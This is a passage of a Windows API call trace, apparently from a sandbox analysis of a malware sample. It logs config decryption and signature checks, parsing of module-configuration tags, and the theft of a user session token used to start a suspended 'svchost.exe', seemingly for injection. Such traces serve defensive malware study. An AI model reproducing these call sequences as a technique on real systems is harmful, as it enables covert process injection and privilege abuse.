	[0225.160] CryptDestroyHash (hHash=0x22b6600) returned 1
	[0225.160] CryptReleaseContext (hProv=0x225d20, dwFlags=0x0) returned 1
	[0225.160] CryptAcquireContextW (in: phProv=0x128ba8, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x128ba8*=0x225d20) returned 1
	[0225.160] CryptCreateHash (in: hProv=0x225d20, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x128bac | out: phHash=0x128bac) returned 1
	[0225.160] CryptHashData (hHash=0x22b6940, pbData=0x2764c60, dwDataLen=0xd40, dwFlags=0x0) returned 1
	[0225.160] CryptGetHashParam (in: hHash=0x22b6940, dwParam=0x4, pbData=0x128ba4, pdwDataLen=0x128ba0, dwFlags=0x0 | out: pbData=0x128ba4, pdwDataLen=0x128ba0) returned 1
	[0225.160] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x277b250
	[0225.160] CryptGetHashParam (in: hHash=0x22b6940, dwParam=0x2, pbData=0x277b250, pdwDataLen=0x128ba4, dwFlags=0x0 | out: pbData=0x277b250, pdwDataLen=0x128ba4) returned 1
	[0225.160] CryptDestroyHash (hHash=0x22b6940) returned 1
	[0225.160] CryptReleaseContext (hProv=0x225d20, dwFlags=0x0) returned 1
	[0225.160] CryptAcquireContextW (in: phProv=0x128ba8, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x128ba8*=0x225d20) returned 1
	[0225.161] CryptCreateHash (in: hProv=0x225d20, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x128bac | out: phHash=0x128bac) returned 1
	[0225.161] CryptHashData (hHash=0x22b6600, pbData=0x2764c60, dwDataLen=0xd60, dwFlags=0x0) returned 1
	[0225.161] CryptGetHashParam (in: hHash=0x22b6600, dwParam=0x4, pbData=0x128ba4, pdwDataLen=0x128ba0, dwFlags=0x0 | out: pbData=0x128ba4, pdwDataLen=0x128ba0) returned 1
	[0225.161] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x277b278
	[0225.161] CryptGetHashParam (in: hHash=0x22b6600, dwParam=0x2, pbData=0x277b278, pdwDataLen=0x128ba4, dwFlags=0x0 | out: pbData=0x277b278, pdwDataLen=0x128ba4) returned 1
	[0225.161] CryptDestroyHash (hHash=0x22b6600) returned 1
	[0225.161] CryptReleaseContext (hProv=0x225d20, dwFlags=0x0) returned 1
	[0225.161] CryptAcquireContextW (in: phProv=0x128ba8, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x128ba8*=0x225d20) returned 1
	[0225.161] CryptCreateHash (in: hProv=0x225d20, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x128bac | out: phHash=0x128bac) returned 1
	[0225.161] CryptHashData (hHash=0x22b6940, pbData=0x2764c60, dwDataLen=0xd80, dwFlags=0x0) returned 1
	[0225.161] CryptGetHashParam (in: hHash=0x22b6940, dwParam=0x4, pbData=0x128ba4, pdwDataLen=0x128ba0, dwFlags=0x0 | out: pbData=0x128ba4, pdwDataLen=0x128ba0) returned 1
	[0225.161] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x277b2a0
	[0225.161] CryptGetHashParam (in: hHash=0x22b6940, dwParam=0x2, pbData=0x277b2a0, pdwDataLen=0x128ba4, dwFlags=0x0 | out: pbData=0x277b2a0, pdwDataLen=0x128ba4) returned 1
	[0225.161] CryptDestroyHash (hHash=0x22b6940) returned 1
	[0225.161] CryptReleaseContext (hProv=0x225d20, dwFlags=0x0) returned 1
	[0225.161] CryptAcquireContextW (in: phProv=0x128ba8, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x128ba8*=0x225d20) returned 1
	[0225.162] CryptCreateHash (in: hProv=0x225d20, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x128bac | out: phHash=0x128bac) returned 1
	[0225.162] CryptHashData (hHash=0x22b6600, pbData=0x2764c60, dwDataLen=0xda0, dwFlags=0x0) returned 1
	[0225.162] CryptGetHashParam (in: hHash=0x22b6600, dwParam=0x4, pbData=0x128ba4, pdwDataLen=0x128ba0, dwFlags=0x0 | out: pbData=0x128ba4, pdwDataLen=0x128ba0) returned 1
	[0225.162] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x277b2c8
	[0225.162] CryptGetHashParam (in: hHash=0x22b6600, dwParam=0x2, pbData=0x277b2c8, pdwDataLen=0x128ba4, dwFlags=0x0 | out: pbData=0x277b2c8, pdwDataLen=0x128ba4) returned 1
	[0225.162] CryptDestroyHash (hHash=0x22b6600) returned 1
	[0225.162] CryptReleaseContext (hProv=0x225d20, dwFlags=0x0) returned 1
	[0225.162] CryptAcquireContextW (in: phProv=0x128ba8, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x128ba8*=0x225d20) returned 1
	[0225.162] CryptCreateHash (in: hProv=0x225d20, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x128bac | out: phHash=0x128bac) returned 1
	[0225.162] CryptHashData (hHash=0x22b6940, pbData=0x2764c60, dwDataLen=0xdc0, dwFlags=0x0) returned 1
	[0225.162] CryptGetHashParam (in: hHash=0x22b6940, dwParam=0x4, pbData=0x128ba4, pdwDataLen=0x128ba0, dwFlags=0x0 | out: pbData=0x128ba4, pdwDataLen=0x128ba0) returned 1
	[0225.162] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x277b2f0
	[0225.162] CryptGetHashParam (in: hHash=0x22b6940, dwParam=0x2, pbData=0x277b2f0, pdwDataLen=0x128ba4, dwFlags=0x0 | out: pbData=0x277b2f0, pdwDataLen=0x128ba4) returned 1
	[0225.162] CryptDestroyHash (hHash=0x22b6940) returned 1
	[0225.162] CryptReleaseContext (hProv=0x225d20, dwFlags=0x0) returned 1
	[0225.162] CryptAcquireContextW (in: phProv=0x128ba8, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x128ba8*=0x225d20) returned 1
	[0225.163] CryptCreateHash (in: hProv=0x225d20, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x128bac | out: phHash=0x128bac) returned 1
	[0225.163] CryptHashData (hHash=0x22b6600, pbData=0x2764c60, dwDataLen=0xde0, dwFlags=0x0) returned 1
	[0225.163] CryptGetHashParam (in: hHash=0x22b6600, dwParam=0x4, pbData=0x128ba4, pdwDataLen=0x128ba0, dwFlags=0x0 | out: pbData=0x128ba4, pdwDataLen=0x128ba0) returned 1
	[0225.163] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x277b318
	[0225.163] CryptGetHashParam (in: hHash=0x22b6600, dwParam=0x2, pbData=0x277b318, pdwDataLen=0x128ba4, dwFlags=0x0 | out: pbData=0x277b318, pdwDataLen=0x128ba4) returned 1
	[0225.163] CryptDestroyHash (hHash=0x22b6600) returned 1
	[0225.163] CryptReleaseContext (hProv=0x225d20, dwFlags=0x0) returned 1
	[0225.163] CryptAcquireContextW (in: phProv=0x128ba8, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x128ba8*=0x225d20) returned 1
	[0225.163] CryptCreateHash (in: hProv=0x225d20, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x128bac | out: phHash=0x128bac) returned 1
	[0225.163] CryptHashData (hHash=0x22b6940, pbData=0x2764c60, dwDataLen=0xe00, dwFlags=0x0) returned 1
	[0225.163] CryptGetHashParam (in: hHash=0x22b6940, dwParam=0x4, pbData=0x128ba4, pdwDataLen=0x128ba0, dwFlags=0x0 | out: pbData=0x128ba4, pdwDataLen=0x128ba0) returned 1
	[0225.163] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x277b340
	[0225.163] CryptGetHashParam (in: hHash=0x22b6940, dwParam=0x2, pbData=0x277b340, pdwDataLen=0x128ba4, dwFlags=0x0 | out: pbData=0x277b340, pdwDataLen=0x128ba4) returned 1
	[0225.163] CryptDestroyHash (hHash=0x22b6940) returned 1
	[0225.163] CryptReleaseContext (hProv=0x225d20, dwFlags=0x0) returned 1
	[0225.163] CryptAcquireContextW (in: phProv=0x128ba8, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x128ba8*=0x225d20) returned 1
	[0225.164] CryptCreateHash (in: hProv=0x225d20, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x128bac | out: phHash=0x128bac) returned 1
	[0225.164] CryptHashData (hHash=0x22b6600, pbData=0x2764c60, dwDataLen=0xe20, dwFlags=0x0) returned 1
	[0225.164] CryptGetHashParam (in: hHash=0x22b6600, dwParam=0x4, pbData=0x128ba4, pdwDataLen=0x128ba0, dwFlags=0x0 | out: pbData=0x128ba4, pdwDataLen=0x128ba0) returned 1
	[0225.164] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x277b368
	[0225.164] CryptGetHashParam (in: hHash=0x22b6600, dwParam=0x2, pbData=0x277b368, pdwDataLen=0x128ba4, dwFlags=0x0 | out: pbData=0x277b368, pdwDataLen=0x128ba4) returned 1
	[0225.164] CryptDestroyHash (hHash=0x22b6600) returned 1
	[0225.164] CryptReleaseContext (hProv=0x225d20, dwFlags=0x0) returned 1
	[0225.164] CryptAcquireContextW (in: phProv=0x128ba8, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x128ba8*=0x225d20) returned 1
	[0225.165] CryptCreateHash (in: hProv=0x225d20, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x128bac | out: phHash=0x128bac) returned 1
	[0225.165] CryptHashData (hHash=0x22b6940, pbData=0x2764c60, dwDataLen=0xe40, dwFlags=0x0) returned 1
	[0225.165] CryptGetHashParam (in: hHash=0x22b6940, dwParam=0x4, pbData=0x128ba4, pdwDataLen=0x128ba0, dwFlags=0x0 | out: pbData=0x128ba4, pdwDataLen=0x128ba0) returned 1
	[0225.165] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x277b390
	[0225.165] CryptGetHashParam (in: hHash=0x22b6940, dwParam=0x2, pbData=0x277b390, pdwDataLen=0x128ba4, dwFlags=0x0 | out: pbData=0x277b390, pdwDataLen=0x128ba4) returned 1
	[0225.165] CryptDestroyHash (hHash=0x22b6940) returned 1
	[0225.165] CryptReleaseContext (hProv=0x225d20, dwFlags=0x0) returned 1
	[0225.165] CryptAcquireContextW (in: phProv=0x128ba8, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x128ba8*=0x225d20) returned 1
	[0225.165] CryptCreateHash (in: hProv=0x225d20, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x128bac | out: phHash=0x128bac) returned 1
	[0225.165] CryptHashData (hHash=0x22b6600, pbData=0x2764c60, dwDataLen=0xe60, dwFlags=0x0) returned 1
	[0225.165] CryptGetHashParam (in: hHash=0x22b6600, dwParam=0x4, pbData=0x128ba4, pdwDataLen=0x128ba0, dwFlags=0x0 | out: pbData=0x128ba4, pdwDataLen=0x128ba0) returned 1
	[0225.165] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x277b3b8
	[0225.165] CryptGetHashParam (in: hHash=0x22b6600, dwParam=0x2, pbData=0x277b3b8, pdwDataLen=0x128ba4, dwFlags=0x0 | out: pbData=0x277b3b8, pdwDataLen=0x128ba4) returned 1
	[0225.165] CryptDestroyHash (hHash=0x22b6600) returned 1
	[0225.165] CryptReleaseContext (hProv=0x225d20, dwFlags=0x0) returned 1
	[0225.165] CryptAcquireContextW (in: phProv=0x128ba8, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x128ba8*=0x225d20) returned 1
	[0225.166] CryptCreateHash (in: hProv=0x225d20, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x128bac | out: phHash=0x128bac) returned 1
	[0225.166] CryptHashData (hHash=0x22b6940, pbData=0x2764c60, dwDataLen=0xe80, dwFlags=0x0) returned 1
	[0225.166] CryptGetHashParam (in: hHash=0x22b6940, dwParam=0x4, pbData=0x128ba4, pdwDataLen=0x128ba0, dwFlags=0x0 | out: pbData=0x128ba4, pdwDataLen=0x128ba0) returned 1
	[0225.166] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x277b3e0
	[0225.166] CryptGetHashParam (in: hHash=0x22b6940, dwParam=0x2, pbData=0x277b3e0, pdwDataLen=0x128ba4, dwFlags=0x0 | out: pbData=0x277b3e0, pdwDataLen=0x128ba4) returned 1
	[0225.166] CryptDestroyHash (hHash=0x22b6940) returned 1
	[0225.166] CryptReleaseContext (hProv=0x225d20, dwFlags=0x0) returned 1
	[0225.166] CryptAcquireContextW (in: phProv=0x128ba8, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x128ba8*=0x225d20) returned 1
	[0225.166] CryptCreateHash (in: hProv=0x225d20, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x128bac | out: phHash=0x128bac) returned 1
	[0225.166] CryptHashData (hHash=0x22b6600, pbData=0x2764c60, dwDataLen=0xea0, dwFlags=0x0) returned 1
	[0225.166] CryptGetHashParam (in: hHash=0x22b6600, dwParam=0x4, pbData=0x128ba4, pdwDataLen=0x128ba0, dwFlags=0x0 | out: pbData=0x128ba4, pdwDataLen=0x128ba0) returned 1
	[0225.166] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x277b408
	[0225.166] CryptGetHashParam (in: hHash=0x22b6600, dwParam=0x2, pbData=0x277b408, pdwDataLen=0x128ba4, dwFlags=0x0 | out: pbData=0x277b408, pdwDataLen=0x128ba4) returned 1
	[0225.166] CryptDestroyHash (hHash=0x22b6600) returned 1
	[0225.166] CryptReleaseContext (hProv=0x225d20, dwFlags=0x0) returned 1
	[0225.166] CryptAcquireContextW (in: phProv=0x128ba8, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x128ba8*=0x225d20) returned 1
	[0225.167] CryptCreateHash (in: hProv=0x225d20, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x128bac | out: phHash=0x128bac) returned 1
	[0225.167] CryptHashData (hHash=0x22b6940, pbData=0x2764c60, dwDataLen=0xec0, dwFlags=0x0) returned 1
	[0225.167] CryptGetHashParam (in: hHash=0x22b6940, dwParam=0x4, pbData=0x128ba4, pdwDataLen=0x128ba0, dwFlags=0x0 | out: pbData=0x128ba4, pdwDataLen=0x128ba0) returned 1
	[0225.167] CryptGetHashParam (in: hHash=0x22b6940, dwParam=0x2, pbData=0x277b430, pdwDataLen=0x128ba4, dwFlags=0x0 | out: pbData=0x277b430, pdwDataLen=0x128ba4) returned 1
	[0225.167] CryptDestroyHash (hHash=0x22b6940) returned 1
	[0225.167] CryptReleaseContext (hProv=0x225d20, dwFlags=0x0) returned 1
	[0225.167] CryptAcquireContextW (in: phProv=0x128ba8, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x128ba8*=0x225d20) returned 1
	[0225.167] CryptCreateHash (in: hProv=0x225d20, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x128bac | out: phHash=0x128bac) returned 1
	[0225.167] CryptHashData (hHash=0x22b6600, pbData=0x2764c60, dwDataLen=0xee0, dwFlags=0x0) returned 1
	[0225.167] CryptGetHashParam (in: hHash=0x22b6600, dwParam=0x4, pbData=0x128ba4, pdwDataLen=0x128ba0, dwFlags=0x0 | out: pbData=0x128ba4, pdwDataLen=0x128ba0) returned 1
	[0225.167] CryptGetHashParam (in: hHash=0x22b6600, dwParam=0x2, pbData=0x277b458, pdwDataLen=0x128ba4, dwFlags=0x0 | out: pbData=0x277b458, pdwDataLen=0x128ba4) returned 1
	[0225.167] CryptDestroyHash (hHash=0x22b6600) returned 1
	[0225.167] CryptReleaseContext (hProv=0x225d20, dwFlags=0x0) returned 1
	[0225.167] CryptAcquireContextW (in: phProv=0x128ba8, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x128ba8*=0x225d20) returned 1
	[0225.168] CryptCreateHash (in: hProv=0x225d20, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x128bac | out: phHash=0x128bac) returned 1
	[0225.168] CryptHashData (hHash=0x22b6940, pbData=0x2764c60, dwDataLen=0xf00, dwFlags=0x0) returned 1
	[0225.168] CryptGetHashParam (in: hHash=0x22b6940, dwParam=0x4, pbData=0x128ba4, pdwDataLen=0x128ba0, dwFlags=0x0 | out: pbData=0x128ba4, pdwDataLen=0x128ba0) returned 1
	[0225.168] CryptGetHashParam (in: hHash=0x22b6940, dwParam=0x2, pbData=0x277b480, pdwDataLen=0x128ba4, dwFlags=0x0 | out: pbData=0x277b480, pdwDataLen=0x128ba4) returned 1
	[0225.168] CryptDestroyHash (hHash=0x22b6940) returned 1
	[0225.168] CryptReleaseContext (hProv=0x225d20, dwFlags=0x0) returned 1
	[0225.168] CryptAcquireContextW (in: phProv=0x128ba8, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x128ba8*=0x225d20) returned 1
	[0225.168] CryptCreateHash (in: hProv=0x225d20, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x128bac | out: phHash=0x128bac) returned 1
	[0225.168] CryptHashData (hHash=0x22b6600, pbData=0x2764c60, dwDataLen=0xf20, dwFlags=0x0) returned 1
	[0225.168] CryptGetHashParam (in: hHash=0x22b6600, dwParam=0x4, pbData=0x128ba4, pdwDataLen=0x128ba0, dwFlags=0x0 | out: pbData=0x128ba4, pdwDataLen=0x128ba0) returned 1
	[0225.168] CryptGetHashParam (in: hHash=0x22b6600, dwParam=0x2, pbData=0x277b4a8, pdwDataLen=0x128ba4, dwFlags=0x0 | out: pbData=0x277b4a8, pdwDataLen=0x128ba4) returned 1
	[0225.168] CryptDestroyHash (hHash=0x22b6600) returned 1
	[0225.168] CryptReleaseContext (hProv=0x225d20, dwFlags=0x0) returned 1
	[0225.170] CryptImportKey (in: hProv=0x225d20, pbData=0x128b98, dwDataLen=0x2c, hPubKey=0x0, dwFlags=0x1, phKey=0x128bd8 | out: phKey=0x128bd8*=0x22b6600) returned 1
	[0225.170] CryptSetKeyParam (hKey=0x22b6600, dwParam=0x4, pbData=0x128bc4*=0x1, dwFlags=0x0) returned 1
	[0225.170] CryptSetKeyParam (hKey=0x22b6600, dwParam=0x1, pbData=0x277b5c0, dwFlags=0x0) returned 1
	[0225.171] CryptDecrypt (in: hKey=0x22b6600, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x27c3ab8, pdwDataLen=0x128bcc | out: pbData=0x27c3ab8, pdwDataLen=0x128bcc) returned 1
	[0225.171] CryptDestroyKey (hKey=0x22b6600) returned 1
	[0225.171] CryptReleaseContext (hProv=0x225d20, dwFlags=0x0) returned 1
	[0225.171] GetVersion () returned 0x1db10106
	[0225.172] BCryptOpenAlgorithmProvider (in: phAlgorithm=0x128bd8, pszAlgId="ECDSA_P384", pszImplementation=0x0, dwFlags=0x0 | out: phAlgorithm=0x128bd8) returned 0x0
	[0225.173] BCryptImportKeyPair (in: hAlgorithm=0x22ee348, hImportKey=0x0, pszBlobType="ECCPUBLICBLOB", phKey=0x128be0, pbInput=0x211118, cbInput=0x68, dwFlags=0x0 | out: phKey=0x128be0) returned 0x0
	[0225.175] BCryptGetProperty (in: hObject=0x229a410, pszProperty="SignatureLength", pbOutput=0x128bf8, cbOutput=0x4, pcbResult=0x128bd0, dwFlags=0x0 | out: pbOutput=0x128bf8, pcbResult=0x128bd0) returned 0x0
	[0225.175] BCryptVerifySignature (hKey=0x229a410, pPaddingInfo=0x0, pbHash=0x22a6650, cbHash=0x30, pbSignature=0x27c82c0, cbSignature=0x60, dwFlags=0x0) returned 0x0
	[0225.178] BCryptDestroyKey (in: hKey=0x229a410 | out: hKey=0x229a410) returned 0x0
	[0225.178] BCryptCloseAlgorithmProvider (in: hAlgorithm=0x22ee348, dwFlags=0x0 | out: hAlgorithm=0x22ee348) returned 0x0
	[0225.178] RtlFreeHeap (HeapHandle=0x1d0000, Flags=0x8, BaseAddress=0x22a6650) returned 1
	[0225.179] lstrlenA (lpString="<moduleconfig>*</moduleconfig>") returned 30
	[0225.179] CharLowerBuffA (in: lpsz="moduleconfig", cchLength=0xc | out: lpsz="moduleconfig") returned 0xc
	[0225.179] RtlFreeHeap (HeapHandle=0x1d0000, Flags=0x8, BaseAddress=0x22b7890) returned 1
	[0225.179] CharLowerBuffA (in: lpsz="needinfo", cchLength=0x8 | out: lpsz="needinfo") returned 0x8
	[0225.179] RtlFreeHeap (HeapHandle=0x1d0000, Flags=0x8, BaseAddress=0x22b7890) returned 1
	[0225.179] CharLowerBuffA (in: lpsz="name", cchLength=0x4 | out: lpsz="name") returned 0x4
	[0225.179] RtlFreeHeap (HeapHandle=0x1d0000, Flags=0x8, BaseAddress=0x22b7890) returned 1
	[0225.179] CharLowerBuffA (in: lpsz="needinfo", cchLength=0x8 | out: lpsz="needinfo") returned 0x8
	[0225.179] RtlFreeHeap (HeapHandle=0x1d0000, Flags=0x8, BaseAddress=0x22b78a8) returned 1
	[0225.179] CharLowerBuffA (in: lpsz="name", cchLength=0x4 | out: lpsz="name") returned 0x4
	[0225.179] RtlFreeHeap (HeapHandle=0x1d0000, Flags=0x8, BaseAddress=0x22b78a8) returned 1
	[0225.179] CharLowerBuffA (in: lpsz="autoconf", cchLength=0x8 | out: lpsz="autoconf") returned 0x8
	[0225.179] RtlFreeHeap (HeapHandle=0x1d0000, Flags=0x8, BaseAddress=0x22b78c0) returned 1
	[0225.179] CharLowerBuffA (in: lpsz="conf", cchLength=0x4 | out: lpsz="conf") returned 0x4
	[0225.179] RtlFreeHeap (HeapHandle=0x1d0000, Flags=0x8, BaseAddress=0x22b78c0) returned 1
	[0225.180] CharLowerBuffA (in: lpsz="ctl", cchLength=0x3 | out: lpsz="ctl") returned 0x3
	[0225.180] RtlFreeHeap (HeapHandle=0x1d0000, Flags=0x8, BaseAddress=0x22b78c0) returned 1
	[0225.180] CharLowerBuffA (in: lpsz="file", cchLength=0x4 | out: lpsz="file") returned 0x4
	[0225.180] RtlFreeHeap (HeapHandle=0x1d0000, Flags=0x8, BaseAddress=0x22b78d8) returned 1
	[0225.180] CharLowerBuffA (in: lpsz="period", cchLength=0x6 | out: lpsz="period") returned 0x6
	[0225.180] RtlFreeHeap (HeapHandle=0x1d0000, Flags=0x8, BaseAddress=0x22b78f0) returned 1
	[0225.180] CharLowerBuffA (in: lpsz="id", cchLength=0x2 | out: lpsz="id") returned 0x2
	[0225.180] RtlFreeHeap (HeapHandle=0x1d0000, Flags=0x8, BaseAddress=0x22b7908) returned 1
	[0225.180] CharLowerBuffA (in: lpsz="ip", cchLength=0x2 | out: lpsz="ip") returned 0x2
	[0225.180] RtlFreeHeap (HeapHandle=0x1d0000, Flags=0x8, BaseAddress=0x22b7908) returned 1
	[0225.185] WriteFile (in: hFile=0x5c8, lpBuffer=0x27bef60*, nNumberOfBytesToWrite=0x48b0, lpNumberOfBytesWritten=0x128c38, lpOverlapped=0x0 | out: lpBuffer=0x27bef60*, lpNumberOfBytesWritten=0x128c38*=0x48b0, lpOverlapped=0x0) returned 1
	[0225.187] CloseHandle (hObject=0x5c8) returned 1
	[0225.187] RtlFreeHeap (HeapHandle=0x1d0000, Flags=0x8, BaseAddress=0x27bef60) returned 1
	[0225.187] RtlFreeHeap (HeapHandle=0x1d0000, Flags=0x8, BaseAddress=0x27ccb48) returned 1
	[0225.187] RtlFreeHeap (HeapHandle=0x1d0000, Flags=0x8, BaseAddress=0x22c75d8) returned 1
	[0225.187] WinHttpCloseHandle (hInternet=0x26ae6f0) returned 1
	[0225.187] WinHttpCloseHandle (hInternet=0x22c5a70) returned 1
	[0225.187] WinHttpCloseHandle (hInternet=0x22c5988) returned 1
	[0225.187] RtlFreeHeap (HeapHandle=0x1d0000, Flags=0x8, BaseAddress=0x2777d80) returned 1
	[0225.187] RtlReAllocateHeap (Heap=0x1d0000, Flags=0x8, Ptr=0x22acdd8, Size=0x10) returned 0x209fc0
	[0225.187] RtlFreeHeap (HeapHandle=0x1d0000, Flags=0x8, BaseAddress=0x22fff90) returned 1
	[0225.187] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="psfin32", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 8
	[0225.188] lstrcmpiW (lpString1="start", lpString2="start") returned 0
	[0225.190] WTSEnumerateSessionsA (in: hServer=0x0, Reserved=0x0, Version=0x1, ppSessionInfo=0x12875c, pCount=0x12876c | out: ppSessionInfo=0x12875c, pCount=0x12876c) returned 1
	[0225.192] WTSFreeMemory (pMemory=0x22a6618) 
	[0225.192] RevertToSelf () returned 1
	[0225.192] WTSQueryUserToken (SessionId=0x1, phToken=0x12877c*=0xffffffff) returned 1
	[0225.192] DuplicateTokenEx (in: hExistingToken=0x5c8, dwDesiredAccess=0x2000000, lpTokenAttributes=0x0, ImpersonationLevel=0x1, TokenType=0x1, phNewToken=0x128790 | out: phNewToken=0x128790*=0x56c) returned 1
	[0225.192] CloseHandle (hObject=0x5c8) returned 1
	[0225.192] GetTokenInformation (in: TokenHandle=0x56c, TokenInformationClass=0x1, TokenInformation=0x0, TokenInformationLength=0x0, ReturnLength=0x128788 | out: TokenInformation=0x0, ReturnLength=0x128788) returned 0
	[0225.192] GetLastError () returned 0x7a
	[0225.192] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x30) returned 0x22a6618
	[0225.192] GetTokenInformation (in: TokenHandle=0x56c, TokenInformationClass=0x1, TokenInformation=0x22a6618, TokenInformationLength=0x24, ReturnLength=0x128788 | out: TokenInformation=0x22a6618, ReturnLength=0x128788) returned 1
	[0225.192] LookupAccountSidW (in: lpSystemName=0x0, Sid=0x22a6620*(Revision=0x1, SubAuthorityCount=0x5, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=([0]=0x15, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0xb)), Name=0x1283a8, cchName=0x128768, ReferencedDomainName=0x1281a8, cchReferencedDomainName=0x128768, peUse=0x128740 | out: Name="2XC7u663GxWc", cchName=0x128768, ReferencedDomainName="ZGW5TDPU", cchReferencedDomainName=0x128768, peUse=0x128740) returned 1
	[0225.194] LoadUserProfileW () returned 0x1
	[0225.257] CreateEnvironmentBlock () returned 0x1
	[0225.260] CreateProcessAsUserW (in: hToken=0x56c, lpApplicationName=0x0, lpCommandLine="svchost.exe", lpProcessAttributes=0x0, lpThreadAttributes=0x0, bInheritHandles=0, dwCreationFlags=0x8000424, lpEnvironment=0x26adad8, lpCurrentDirectory=0x0, lpStartupInfo=0x1286bc*(cb=0x44, lpReserved="", lpDesktop="winsta0\\default", lpTitle="taskeng.exe", dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x81, wShowWindow=0x0, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x1d68c8, hStdOutput=0x2777d80, hStdError=0x1d6c70), lpProcessInformation=0x128730 | out: lpCommandLine="svchost.exe", lpProcessInformation=0x128730*(hProcess=0x62c, hThread=0x628, dwProcessId=0xb28, dwThreadId=0xb38)) returned 1
	[0225.264] UnloadUserProfile () returned 0x1
	[0225.265] CloseHandle (hObject=0x56c) returned 1
	[0225.265] DestroyEnvironmentBlock () returned 0x1
	[0225.265] RtlFreeHeap (HeapHandle=0x1d0000, Flags=0x8, BaseAddress=0x22a6618) returned 1
	[0225.265] AdjustTokenPrivileges (in: TokenHandle=0x5d4, DisableAllPrivileges=0, NewState=0x128700, BufferLength=0x10, PreviousState=0x0, ReturnLength=0x0 | out: PreviousState=0x0, ReturnLength=0x0) returned 1
	[0225.265] CloseHandle (hObject=0x5d4) returned 1
	[0225.265] RtlFreeHeap (HeapHandle=0x1d0000, Flags=0x8, BaseAddress=0x2777d80) returned 1
	[0225.265] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x2777d80
	[0225.265] CreateEventW (lpEventAttributes=0x0, bManualReset=0, bInitialState=0, lpName=0x0) returned 0x5d4
	[0225.266] CreateEventW (lpEventAttributes=0x0, bManualReset=0, bInitialState=0, lpName=0x0) returned 0x56c
	[0225.266] CreateEventW (lpEventAttributes=0x0, bManualReset=1, bInitialState=1, lpName=0x0) returned 0x55c
	[0225.266] GetCurrentProcess () returned 0xffffffff
	[0225.266] DuplicateHandle (in: hSourceProcessHandle=0xffffffff, hSourceHandle=0x5d4, hTargetProcessHandle=0x62c, lpTargetHandle=0x128808, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x128808*=0x4) returned 1
	[0225.266] GetCurrentProcess () returned 0xffffffff
